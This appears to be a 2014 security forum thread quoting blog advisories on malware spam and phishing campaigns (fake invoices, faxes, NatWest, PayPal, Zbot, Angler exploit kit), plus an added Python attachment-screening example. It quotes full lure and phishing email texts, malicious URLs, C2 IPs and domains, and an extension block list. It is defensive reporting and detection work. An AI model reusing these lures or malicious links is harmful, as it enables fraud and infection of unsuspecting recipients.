11 Sep 2014 - "'new order' pretending to come from random names at live .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... This email has various subjects, including new order, new invoice, FWD:invoice, FWD Order... The attachment file names are so far all the same and it extracts to a -fake- Windows shortcut file (.pif). Even setting show file extensions will -not- show the .pif extension in Windows 8 and the unzipped file will look like a genuine Windows shortcut, so you need to be especially wary and cautious. See below:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/pif-not-showing.png
The email looks like:
Warmest regards,
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/new-order.png

11 September 2014: 2014.09.11.zip : Extracts to: 2014.09.11.pdf.pif
Current Virus total detections: 4/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .pif ( windows shortcut) file it really is, so making it much more likely for you to accidentally open it and be infected... The basic rule is NEVER open any attachment to an email, unless you are expecting it... Never just blindly click on the file in your email..."
* https://www.virustotal.com/en/file/1425dcfbe06fa76c7b1e491e4573afedd2a867e50650b9ad70e90ae872024821/analysis/1410427007/

:mad::mad: :fear:

AplusWebMaster
2014-09-12, 12:08
FYI...

Fake Invoice SPAM - contains malicious VBS script
- http://blog.mxlab.eu/2014/09/12/fake-email-copie-facture-societe-lws-fc-contains-malicvious-vbs-script/
Sep 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “[COPIE FACTURE SOCIETE LWS FC-408185] – [LWS INVOICE] 10/09/2014″. This email is sent from the spoofed address “Service clients LWS <noreply@ lws .com>” and has the following body:
S.A.R.L LWS
4, rue galvani
75838 PARIS Cedex 17
Paris le, 10/09/2014
Veuillez trouver en pièce jointe votre facture de référence: facture FC-408185 (Fichier: facture-408185) au format ZIP.
Si vous n’avez pas WinRar (Logiciel permettant de lire les fichiers ZIP) vous pouvez le télécharger ici:
http ://www .rarlab .com/download.htm
Merci pour la confiance que vous nous accordez,
Le service comptabilité LWS ...

The attached ZIP file has the name FACTURE_45871147.zip and contains the 4 kB file FACTURE_45871147.vbs. The VBS script in fact is encoded to hide the real purpose but it seems that this script will download other malicious files and will install them on a system in order to infect the computer. The trojan is known as Trojan.Script.Crypt.deehcf or VBS/Dloadr-DVY. At the time of writing, 2 of the 53* AV engines did detect the trojan at Virus Total..."
* https://www.virustotal.com/en/file/adf506eebd74dbdd2e23ab2a0918912a95105745226302cca32c760c34d196a5/analysis/
___

Fake Household Improvement SPAM - Zbot Malware
- https://blog.malwarebytes.org/fraud-scam/2014/09/household-improvement-emails-come-with-zbot-malware/
Sep 12, 2014 - "... malicious email in circulation at the moment which claims to contain an invoice from a Kitchen Appliance company. According to another recipient of the mail*, the named company is actually a real business entity although there’s no suggestion that they’ve been hacked or otherwise compromised – it seems the scammers just opened up a directory, said “That one” and just started pretending to be them. The mail reads as follows:
Screenshot: https://blog.malwarebytes.org/wp-content/uploads/2014/09/kitchens1.jpg
... The email comes with a .zip attachment, which contains a piece of Malware known as Zbot. Zeus (aka Zbot) is something to be avoided, as it can lead to banking password theft, form grabbing, keystroke logging and also Ransomware. The zip contains an executable made to look like a Word .doc file, which is a trick as old as the hills yet extremely effective where catching people out is concerned. Telling Windows to display known file extensions will help to avoid this particular pitfall... we detect this as Trojan.Spy.Zbot, and the current Virus Total scores currently clock in at 29/54**... there’s another mail*** doing the rounds which spoofs the same email address mentioned above, yet claims to be sent from a toiletries company. If you’ve bought any form of kitchen / household upgrade or addition recently and receive mails with zipped invoices, you may not recall exactly who you bought all of your items from. With that in mind, you may wish to have a look at your receipts and bank statements, and – on the off chance the randomly selected company named in the spam mails matches up – give them a call directly to confirm they really did send you something. There’s a good chance they probably didn’t..."
* http://myonlinesecurity.co.uk/m-m-kitchen-appliances-inv211457-fake-word-doc-malware/

** https://www.virustotal.com/en/file/941434a32431048380956c6bb7c6be5fd4105ac397eb8c46011d27e827014f73/analysis/

*** http://blog.mxlab.eu/2014/09/12/fake-email-with-attached-invoice-from-broad-oak-toiletries-ltd-contains-trojan/
___

Data Breaches and PoS RAM Scrapers
- http://blog.trendmicro.com/trendlabs-security-intelligence/2014-an-explosion-of-data-breaches-and-pos-ram-scrapers/
Sep 11, 2014 - "... Ever since the Target data breach came into the limelight, there has been a constant stream of merchants/retailers publicly disclosing data breach incidents. These data breaches typically involve credit card data theft using PoS RAM scrapers. Early this month, Brian Krebs reported yet another big data breach that involves U.S. retailer Home Depot using a new variant of the BlackPOS PoS RAM scraper. Nearly all Home Depot locations in the US are believed to have been affected and it is speculated this data breach might surpass the Target breach in terms of volume of data stolen. In addition to an increased number of data breaches, 2014 also brings an increase in the number of new PoS RAM scraper families. Our PoS RAM scraper family tree illustrates the evolution as follows:
Evolution of the PoS RAM scraper family
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/Figure-3-01.png
... Of the six new variants discovered in 2014, four were discovered between June and August.
- Soraya – discovered in June and is a Dexter- and ZeuS-inspired malware. In addition to scraping RAM for credit card Tracks 1 and 2 data, it borrows tricks from ZeuS for hooking the NtResumeThread API, and injects itself into all new processes. It also borrows ZeuS’s form-grabbing functionality and hooks the browser’s HTTP POST function. Trend Micro detects Soraya variants as TSPY_SORAYA.A.
- BrutPOS – discovered in July and appears to have borrowed functionality from a BlackPOS variant. It attempts to exploit PoS systems that use weak or default passwords and have open Remote Desktop Protocol (RDP) ports. BrutPOS will brute-force the login:password combinations to gain entry into the system. Trend Micro detects BrutPOS variants as TROJ_TIBRUN.B and TROJ_TIBRUN.SM.
- Backoff – discovered in July, is a successor of Alina. It implements an updated data search function and drops a watchdog process that ensures Backoff is always running on the system. The cybercriminals use publicly available tools to brute-force entry into RDP applications on PoS systems and install Backoff. Trend Micro detects Backoff variants as TSPY_POSLOGR.A, TSPY_POSLOGR.B, and TSPY_POSLOGR.C.
- BlackPOS ver 2.0 – discovered in August, clones the exfiltration technique that the BlackPOS variant used to compromise U.S. retailer Target. BlackPOS ver 2.0 also adds a unique feature where it pretends to be an AV product installed on the system to avoid drawing unwanted attention to itself. Reports indicate that this malware appears to have been used in the latest big data breach targeting Home Depot. Trend Micro detects BlackPOS ver 2.0 variants as TSPY_MEMLOG.A..."

:mad: :fear:

AplusWebMaster
2014-09-15, 03:44
FYI...

Phish - Paypal ...
- http://myonlinesecurity.co.uk/paypal-account-will-limited-hear-phishing/
14 Sep 2014 - "'Paypal Your account will be limited until we hear from you' pretending to come from service_paypal=cczazmam .com@ wpengine .com; on behalf of; service_paypal@ cczazmam .com. There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card... The original email looks like this. It will NEVER be a genuine email from PayPal or Your Bank so don’t ever follow the links in the email...
PayPal account information :
Hello,
Dear PayPal user ,
Your account will be limited if you not confirm it .
Need Assistance?
Some information on your account appears to be missing or incorrect.
Please update your account promptly so that you can continue to enjoy
all the benefits of your PayPal account.
If you don’t update your account within 37 days, we’ll limit what you can do with your PayPal account.
Please Login to confirm your information :
http ://rangeviewrentals .com//wp-content/themes/twentytwelve/wester.html
Reference Number: PP-003-211-347-423
Yours sincerely,
PayPal

This particular phishing campaign starts with an email with a link. In this case to a hacked compromised website, which looks nothing like any genuine PayPal page:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/rangeview_paypal_phishing-scam.png
This one wants your personal details, your Paypal account log in details and your credit card and bank details and your email log in details . Many of them are also designed to specifically steal your facebook and other social network log in details..."

:fear: :mad:

AplusWebMaster
2014-09-15, 13:13
FYI...

Fake Termination SPAM – malware
- http://myonlinesecurity.co.uk/termination-due-policy-violation-malware/
15 Sep 2014 - "There can’t be a much more alarming email to open first thing on a Monday Morning than one that pretends to say that you have been fired... 'Termination due to policy violation #33205939124' pretending to come from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Today’s email template attaches an arj file. This sort of compressed file is rarely used nowadays and many popular zip file programs will not automatically extract them. -Any- email received with an ARJ attachment should be immediately -deleted- . NO legitimate company or program ever uses that form of compression nowadays. To make it even harder to quickly detect, all the attachments are randomly named and extract to a different randomly named file and each one has a totally different SHA1 or MD5 #. Loads of slightly different subjects with this one, including
Policy violation #59892665326
Termination due to policy violation #33205939124
Termination #59147901198
All the alleged infringements or violations have different numbers... The email looks like:
Hello,
We regret to inform you that your employment with A&M Defence & Marine Services Ltd is being terminated. Your termination is the result of the following violations of company policy:
- 0A4 44 12.09.2011
- 0A4 46 12.09.2011
- 0A4 85 12.09.2011
You were issued written warnings on 19.08.2014. As stated in your final warning, you needed to take steps to correct your behavior by 15.09.2014. Your failure to do so has resulted in your termination. To appeal this termination, you must return written notification of your intention to appeal to Wynona Kinnare in A&M Defence & Marine Services Ltd no later than 06:00PM on 21.09.2014.
Sincerely,
Pauletta Stephens ...

15 September 2014: disturbance_2014-09-15_08-38-12_33205939124.arj:
Extracts to: disturbance_2014-09-15_08-38-12_33205939124.exe
Current Virus total detections: 3/53* . This 'Termination due to policy violation #33205939124' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/eb62d2fc255b934706b15eb5fa4f07fdf3a900810820ef60db62b77de1d4c4ef/analysis/
... Behavioural information
___

LinkedIn feature exposes Email Addresses
- http://krebsonsecurity.com/2014/09/linkedin-feature-exposes-email-addresses/
Sep 15, 2014 - "One of the risks of using social media networks is having information you intend to share with only a handful of friends be made available to everyone. Sometimes that over-sharing happens because friends betray your trust, but more worrisome are the cases in which a social media platform itself exposes your data in the name of marketing... According to researchers at the Seattle, Wash.-based firm Rhino Security Labs, at the crux of the issue is LinkedIn’s penchant for making sure you’re as connected as you possibly can be. When you sign up for a new account, for example, the service asks if you’d like to check your contacts lists at other online services (such as Gmail, Yahoo, Hotmail, etc.). The service does this so that you can connect with any email contacts that are already on LinkedIn, and so that LinkedIn can send invitations to your contacts who aren’t already users... Rhino Security founders Benjamin Caudill and Bryan Seely have a recent history of revealing how trust relationships between and among online services can be abused to expose or divert potentially sensitive information... In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses..."
(More at the krebsonsecurity URL above.)
___

Fake Overdue invoice SPAM - malicious .arj attachment
- http://blog.dynamoo.com/2014/09/overdue-invoice-6767390-spam-has.html
15 Sep 2014 - "This -fake- invoice email has a malicious attachment:
From: Mauro Reddin
Date: 15 September 2014 10:32
Subject: Overdue invoice #6767390
Morning,
I was hoping to hear from you by now. May I have payment on invoice #84819995669 today please, or would you like a further extension?
Best regards,
Mauro Reddin ...

The attachment is an archive file invc_2014-09-15_15-07-11_6767390.arj so in order to get infected you would need an application capable of handling ARJ archives. Once unpacked, there is a malicious executable called invc_2014-09-15_15-07-11_88499270.exe which has a VirusTotal detection rate of just 1/55*... recommend that you apply the following blocklist (Long list at the dynamoo URL above.) ..."
* https://www.virustotal.com/en-gb/file/c21b719a9cf4c5aa9d8927c185be4181d7c465b01fa85e38c7a3d459930e2203/analysis/1410773681/
___

Fake Sage 'Outdated Invoice' SPAM ...
- http://blog.dynamoo.com/2014/09/sage-outdated-invoice-spam_15.html
15 Sep 2014 - "... another -fake- Sage email leading to malware:

Screenshot: http://4.bp.blogspot.com/-knPfcbJT0Q4/VBbJyysrTNI/AAAAAAAAFnI/YbEjR56dgRU/s1600/sage.png

... This ZIP file contains a malicious executable Invoice18642.scr which has a VirusTotal detection rate of just 1/55*. The ThreatTrack report... shows that it attempts to communicate with the following resources:
..."
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/
___

Fake 'secure' NatWest SPAM – PDF malware
- http://myonlinesecurity.co.uk/received-new-secure-message-natwest-fake-pdf-malware/
15 Sep 2014 - "'You have received a new secure message from NatWest' pretending to come from NatWest <secure@natwest.com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
[ NatWest logo ]
You have a new private message from NatWest
To view/read this your secure message please click here
Email Encryption Provided by NatWest. Learn More.
Email Security Powered by Voltage IBE
Copyright 2014 National Westminster Bank Plc. All rights reserved.
Footer Logo NatWest
To unsubscribe please click here ...

15 September 2014: SecureMessage.zip ( 8kb) : Extracts to: SecureMessage.scr
Current Virus total detections: 1/55* . This 'You have received a new secure message from NatWest' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/90ad158dd663e0bfc1f848d8a00890dbd9a24618d7a25d377d9de6baac0b61f4/analysis/1410779812/

- http://threattrack.tumblr.com/post/97567721558/natwest-secure-message-spam
Sep 15, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/65aed37f33dcaf8e16e0b2e828d4f53e/tumblr_inline_nby6ovZu2c1r6pupn.png
___

Phish - Lloyds 'Secure' SPAM...
- http://myonlinesecurity.co.uk/lloyds-bank-new-secure-message-phishing/
15 Sep 2014 - "There are a few major common subjects in a phishing attempt. The majority are either PayPal or your Bank or Credit Card, with a message saying some thing like:
- There have been unauthorised or suspicious attempts to log in to your account, please verify
- Your account has exceeded its limit and needs to be verified
- Your account will be suspended !
- You have received a secure message from < your bank>
- New Secure Message
- We are unable to verify your account information
- Update Personal Information
- Urgent Account Review Notification
- We recently noticed one or more attempts to log in to your PayPal account from a foreign IP address
- Confirmation of Order
This one is 'LLoyds bank New Secure Message' pretending to come from Eli.Ray@ lloydsbank .com or David.Ricard@ lloydsbank .com... Email looks like:
[ Lloyds TSB logo ]
(New users may need to verify their email address)
If you do not see or cannot click “Read Message” / click here
Desktop Users:
You will be prompted to open (view) the file or save (download) it to your computer. For best results, click Read Message button.
Mobile Users:
Install the mobile application.
Protected by the Voltage SecureMail Cloud
SecureMail has a NEW LOOK to better support mobile devices!
Disclaimer: This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender...

Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/lloyds_bank_secure_message.png

This one wants your personal details and bank details..."
___

Fake Fax SPAM - malware attachment
- http://myonlinesecurity.co.uk/received-fax-fake-pdf-malware/
15 Sep 2014 - "'You have received a fax' pretending to come from fax .co.uk <fax@ documents55 .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You have received a new fax. This fax was received by Fax Server.
The fax has been downloaded to dropbox service (Google Inc).
To view your fax message, please download from the link below. It’s
operated by Dropbox and safety...
Received Fax Details
Received on:1 5/09/2014 10:14 AM
Number of Pages: 1 ...

15 September 2014: Docs0972.zip ( 8kb): Extracts to: Docs0972.scr
Current Virus total detections: 0/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bec0ac2711f99f90f27a29a9e021bedfede02c139f26dcfae36e2d8895babf52/analysis/1410804563/
___

Twitch users shook by money spending malware
- http://www.theinquirer.net/inquirer/news/2367489/twitch-users-shook-by-money-spending-malware
15 Sep 2014 - "... F-Secure has warned gamers that the Twitch video streaming service has been hit with malware that can spend users' money. The firm revealed its concerns in a blog post on Friday*, shining a dark light on the new gaming console darling and its role in the world of Steam. F-Secure said that an alarmed Twitch user - not Amazon - approached it with some concerns, explaining that a lure in the Twitch chat feature offers access to a raffle. We all know what can and usually does follow clicking an unsolicited link, and that is the start of a one-way trip to malware. This link, which purports to offer gaming gewgaws, is yet another lie, said F-Secure. It explained that a "Twitch-bot" account "bombards" the chat feature and tickles users with its lure..."
More detail here:
* http://www.f-secure.com/weblog/archives/00002742.html

:fear::fear: :mad:
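
One way a mail gateway can screen for the two lures that recur in the posts above (an executable inside a ZIP carrying a document-style double extension such as 2014.09.11.pdf.pif, IMG_00005_09112014.jpeg.pif or Docs0972.scr, and .arj archives that should simply be blocked at the perimeter), as an added Python example that is not code from any of the quoted blogs. The extension lists are the author's own policy choices, and every sample name and archive is constructed here from filenames given in the posts:

```python
"""Attachment screening for ZIP-wrapped executables with document-style double
extensions and for unusual archive types. Added example; the sample archives
and names are constructed from filenames quoted in the posts above."""
from __future__ import annotations

import io
import zipfile
from dataclasses import dataclass

# Types Windows runs on double-click. Explorer hides .pif even with
# "show known file extensions" enabled, which is why the lures use it.
EXECUTABLE_EXTS = {"exe", "scr", "pif", "com", "bat", "cmd", "vbs",
                   "vbe", "js", "jse", "wsf", "hta", "cpl", "msi"}
# Types whose icon the lure imitates (PDF, Word and JPEG in the posts).
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt"}
# Archive types legitimate business mail essentially never uses (policy choice).
UNUSUAL_ARCHIVE_EXTS = {"arj", "ace", "lzh", "cab"}


@dataclass(frozen=True)
class Verdict:
    name: str
    block: bool
    reason: str


def classify_name(name: str) -> Verdict:
    """Decide on a single file name (outer attachment or archive member)."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    exts = base.split(".")[1:]   # "2014.09.11.pdf.pif" -> ["09", "11", "pdf", "pif"]
    if not exts:
        return Verdict(name, False, "no extension")
    last = exts[-1]
    if last in UNUSUAL_ARCHIVE_EXTS:
        return Verdict(name, True, f"archive type .{last} not used by legitimate senders")
    if last in EXECUTABLE_EXTS:
        # The real signal: an executable type hiding behind a document type.
        if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTS:
            return Verdict(name, True,
                           f"double extension .{exts[-2]}.{last} posing as a document")
        return Verdict(name, True, f"executable type .{last}")
    return Verdict(name, False, f".{last} not in the executable list")


def scan_zip(data: bytes) -> list[Verdict]:
    """Look inside a ZIP attachment: in the posts the lure is always a ZIP
    whose single member is the real executable."""
    verdicts = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.is_dir():
                verdicts.append(classify_name(info.filename))
    return verdicts


def screen_attachment(name: str, data: bytes) -> Verdict:
    """Top-level policy: block on the outer name, else on any risky ZIP member."""
    outer = classify_name(name)
    if outer.block:
        return outer
    if name.lower().endswith(".zip"):
        try:
            bad = [v for v in scan_zip(data) if v.block]
        except zipfile.BadZipFile:
            return Verdict(name, True, "attachment claims .zip but is not a ZIP")
        if bad:
            return Verdict(name, True, f"ZIP member {bad[0].name}: {bad[0].reason}")
    return outer


def make_zip(members: dict[str, bytes]) -> bytes:
    """Build a constructed in-memory ZIP for the demo; payloads are inert text."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for member, content in members.items():
            zf.writestr(member, content)
    return buf.getvalue()


if __name__ == "__main__":
    # Names taken from the posts; the bytes are placeholders, not malware.
    samples = {
        "2014.09.11.zip": make_zip({"2014.09.11.pdf.pif": b"placeholder"}),
        "Docs0972.zip": make_zip({"Docs0972.scr": b"placeholder"}),
        "photo.zip": make_zip({"photo/photo.exe": b"placeholder"}),
        "invoice_8958508.arj": b"placeholder",
        "quarterly_report.zip": make_zip({"report.pdf": b"%PDF-1.4 placeholder"}),
    }
    for name, data in samples.items():
        v = screen_attachment(name, data)
        print(f"{'BLOCK' if v.block else 'allow':5}  {name:22}  {v.reason}")
```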

AplusWebMaster
2014-09-16, 12:16
FYI...

Fake 'Payments' SPAM ...
- http://blog.mxlab.eu/2014/09/16/trojan-genvariant-graftor-155439-present-in-fake-emails-regarding-payments/
Sep 16, 2014 - "... intercepted different campaigns where the trojan Gen:Variant.Graftor.155439 is present in the attached ZIP archive. The trojan is known as Gen:Variant.Graftor.155439 by most AV engines but it’s also known as Trojan/Win32.Zbot, HW32.Paked.1F59, Generic-FAUS!BA7599C952BE or PE:Malware.XPACK-HIE/Heur!1.9C48. The first email comes with the subject “Re: today payment done”, is sent from a spoofed address and has the following body:
Dear sir,
Today we have able to remit the total amount of US$ 51,704.97 to your account. Details of our payments are as follows:
Cont. #41 SPV001/APR/13 US$34,299.13 – 11,748.82 (50% disc. For R008 & R016) =
Cont. #42 EXSQI013/MAY/13 US$29,154.66
Total Remittance: US$ 51,704.97
Attached is the TT copy, check with your bank and let us know when you will proceed with shipment.
Thank you very much.
Best regards,
Me

The attached ZIP file has the name swift copy.zip and contains the swift copy.scr file. At the time of writing, 11 of the 54 AV engines did detect the trojan at Virus Total*...
* https://www.virustotal.com/en/file/db9eb842deb7cbda56c3df7c1e198fac5f0d65d0d8ef9df2f13618d18416c686/analysis/
The second email comes with the subject “Re: Balance payment”, is sent from a spoofed address and has the following body:
The attached TT copy is issued at the request of our customer. The advice is for your reference only.
Yours faithfully,
Global Payments and Cash Management
Bank of America (BOA)
This is an auto-generated email, please DO NOT REPLY. Any replies to this
email will be disregarded...

The attached ZIP file has the name original copy.zip and contains the original copy.scr file. At the time of writing, 12 of the 55 AV engines did detect the trojan at Virus Total**..."
** https://www.virustotal.com/en/file/f7f1b10365b995c308d1cc4a3f025e5e7f249fbfee82f7bcd8297e1c5fcc1635/analysis/
___

Fake 'My new photo ;)' SPAM - malware attachment
- http://blog.mxlab.eu/2014/09/16/email-my-new-photo-contains-a-variant-of-trojan-win32-swizzor-2o-trojan/
Sep 16, 2014 - "... intercepted a new trojan variant distribution campaign by email with the subject “My new photo ;)”. This email is sent from a spoofed address and has the following short body in very poor English:
my new photo ;)
if you like my photo to send me u photo

The attached ZIP file has the name photo.zip; once extracted, a folder photo is available that contains the 127 kB file photo.exe. The trojan is known as a variant of Trojan.Win32.Swizzor.2!O. At the time of writing, 1 of the 54 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/83d322707828350ba51301b1a0d02ee0c831b88bb9722036ade2b7d8827817cb/analysis/
... Behavioural information
___

Fake USPS SPAM - word doc malware
- http://myonlinesecurity.co.uk/usps-postal-notification-service-fake-word-doc-malware/
16 Sep 2014 - "'USPS Postal Notification Service' pretending to come from USPS is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/usps-postal-notification-service.png

16 September 2014: Label.zip ( 82 kb): Extracts to: Label.exe
Current Virus total detections: 20/54* . This USPS Postal Notification Service is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper Microsoft Word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/6678ff966e942e4bf669d8a240acbab79971c871152f3c16478a3ec0c3f5c805/analysis/1410841682/
___

Fake 'inovice' SPAM ...
- http://blog.dynamoo.com/2014/09/inovice-0293991-september-spam.html
16 Sep 2014 - "This spam mis-spells "invoice" in the subject line, and has an .arj file attached that contains a malicious binary.
Example subjects:
inovice 8958508 September
inovice 7682161 September
inovice 4868431 September
inovice 0293991 September
Body text:
This email contains an invoice file attachment

The name of the attachment varies, but is in the format invoice_8958508.arj which contains a malicious executable invoice_38898221_spt.exe which has a VirusTotal detection rate of just 3/54*. The ThreatTrack report...and Anubis report show a series of DGA domains... that are characteristic of Zbot, although none of these domains are currently resolving. If your organisation can -block- .arj files at the mail perimeter then it is probably a good idea to do so."
* https://www.virustotal.com/en-gb/file/ee43410ecaba583a03eb3cfbf1af1afb38a5f25cd8742b47372b853d83fc7089/analysis/1410860283/
... Behavioural information
TCP connections:
208.91.197.27: https://www.virustotal.com/en/ip-address/208.91.197.27/information/
___

Fake FAX SPAM... again
- http://blog.dynamoo.com/2014/09/youve-received-new-fax-spam.html
16 Sep 2014 - "... a facsimile transmission...
From: Fax
Date: 16 September 2014 11:05
Subject: You've received a new fax
New fax at SCAN0204102 from EPSON by ...
Scan date: Tue, 16 Sep 2014 15:35:59 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can download your fax message at: ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...

The link is so obviously not anything to do with Google. Clicking on it loads another script from triera .biz.ua/twndcrfbru/zjliqkgppi.js which in turn downloads a ZIP file from www .yerelyonetisim .org.tr/pdf/Message_2864_pdf.zip which has a VirusTotal detection rate of 3/55*. This malware then phones home... Recommended blocklist:
..."
* https://www.virustotal.com/en-gb/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake forgeries 'Copied invoices' SPAM
- http://blog.dynamoo.com/2014/09/kifilwe-shakong-copied-invoices-spam.html
16 Sep 2014 - "Kifilwe Shakong is a real person who works for Cashbuild in South Africa. She is not the person sending these messages; they are forgeries. Cashbuild's systems have not been compromised in any way. As you might guess, these messages have a malicious attachment.
From: Kifilwe Shakong [kshakong@ cashbuild .co.za]
Date: 16 September 2014 12:17
Subject: Copied invoices
The attached invoices are copies. We will not be able to pay them. Please send clear invoices.
This outbound email has been scanned by the IS Mail Control service.
For more information please visit http ...
The attached invoices are copies. We will not be able to pay them. Please send clear invoices...

Attached is a file with a filename in the format SKMBT_75114091015230.zip which in turn contains a malicious executable SKMBT_75114091015230.exe which has a very low detection rate at VirusTotal of just 1/54*... the malware attempts to phone home to the following domains and IPs which are worth blocking:
..."
(More detail at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/e324d73b36f1fd31c53f6ae21457c2fd57f90be56dcd776efbe06b01fdaf3d5d/analysis/1410866733/
... Behavioural information
DNS requests
golklopro .com
cosjesgame .su
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Unpaid invoice' SPAM - leads to Angler Exploit Kit
- http://blog.dynamoo.com/2014/09/unpaid-invoice-notification-spam-leads.html
16 Sep 2014 - "This convincing-looking but -fake- spam leads to an exploit kit.
From: Christie Foley [christie.foley@ badinsky .sk]
Reply-to: Christie Foley [christie.foley@ badinsky .sk]
Date: 16 September 2014 13:55
Subject: Unpaid invoice notification ...

Screenshot: https://1.bp.blogspot.com/-4dVURai9zaE/VBg551t4f-I/AAAAAAAAFoA/l2blM5UgsbU/s1600/invoice.png

The link in the email goes to:
[donotclick]tiragreene .com/aspnet_client/system_web/4_0_30319/invoice_unn.html
Which in turn goes to an Angler EK landing page at:
[donotclick]108.174.58.239:8080 /wn8omxftff
You can see the URLquery report for the EK here*. I would strongly recommend blocking web traffic to 108.174.58.239 (ColoCrossing, US)."
* http://urlquery.net/report.php?id=1410873578924

- http://myonlinesecurity.co.uk/notification-amount-overdue-recent-invoice-java-exploit-malware/
16 Sep 2014
___

Fake 'PAYMENT SCHEDULE' email - 419 SCAM
- http://myonlinesecurity.co.uk/reyour-payment-schedule-pretending-come-dr-mrs-ngozi-o-iweala/
16 Sep 2014 - "'RE:YOUR PAYMENT SCHEDULE' pretending to come from Dr Mrs Ngozi O. Iweala is a -scam-. After all the current batches of very nasty and tricky malware being attached to emails or as links in emails, it really is a change to see a good old fashioned 419 scam:
Attn:Beneficiary,
My name is Mrs Ngozi Okonjo Iweala,I am the current minister of finance of Nigeria.
Your payment file has been in our desk since two weeks ago and Mr.Croft from Australia submitted claims on your funds stating that
you have given him the authority to claim the funds but we stopped him first until we receive a confirmation from any of you. You are
therefore requested to get back to us to confirm the authenticity of the application of claim submitted by Mr Croft or if you did not
authorized him for any reason,urgently get back to us so that we can direct you on how you are going to receive your fund via Automated
Teller Machine System( ATM CARD).
Please,response back with all your full details mostly your confidential address where you will have the ATM card delivered to you. Your urgent response is highly needed.
Reply also to : fminister88 @gmail .com
Your faithfully.
Dr Mrs Ngozi O. Iweala.
Finance Of Minister.

[Arrgghh...]
___

Fake Nat West SPAM - PDF malware
- http://myonlinesecurity.co.uk/nat-west-bacs-transfer-remittance-jsag828gbp-fake-pdf-malware/
16 Sep 2014 - "'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
We have arranged a BACS transfer to your bank for the following amount : 4933.00
Please find details at our secure link below: ...

This is another version of the same upatre zbot downloaders that have been spammed out today with exactly the same payload as 'NatWest You have a new Secure Message – file-4430 – fake PDF malware'*. This 'Nat West BACS Transfer : Remittance for JSAG828GBP' is another one of the spoofed icon files that, unless you have “show known file extensions” enabled, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* http://myonlinesecurity.co.uk/natwest-new-secure-message-file-4430-fake-pdf-malware/

- https://www.virustotal.com/en/file/8f0aab0abbbe1519dadff8bc206568b144dfd36b605be090fe3098898e926832/analysis/1410862754/
... Behavioural information
TCP connections
188.165.204.210: https://www.virustotal.com/en/ip-address/188.165.204.210/information/
198.143.152.226: https://www.virustotal.com/en/ip-address/198.143.152.226/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___

Fake 'Dhl Delivery' SPAM - contains trojan
- http://blog.mxlab.eu/2014/09/16/fake-email-fwd-dhl-delivery-attempt-contains-trojan/
Sep 16, 2014 - "... intercepted a new trojan distribution campaign by email with the subject 'Fwd: Dhl Delivery Attempt (Invoice Documents)'. This email is sent from the spoofed address 'enquiry@ dhl .com' and has the following body:
We attempted to deliver your item at 17:32pm on Sept 15th, 2014.
The delivery attempt failed because nobody was present at the shipping address, so this notification has been automatically generated.
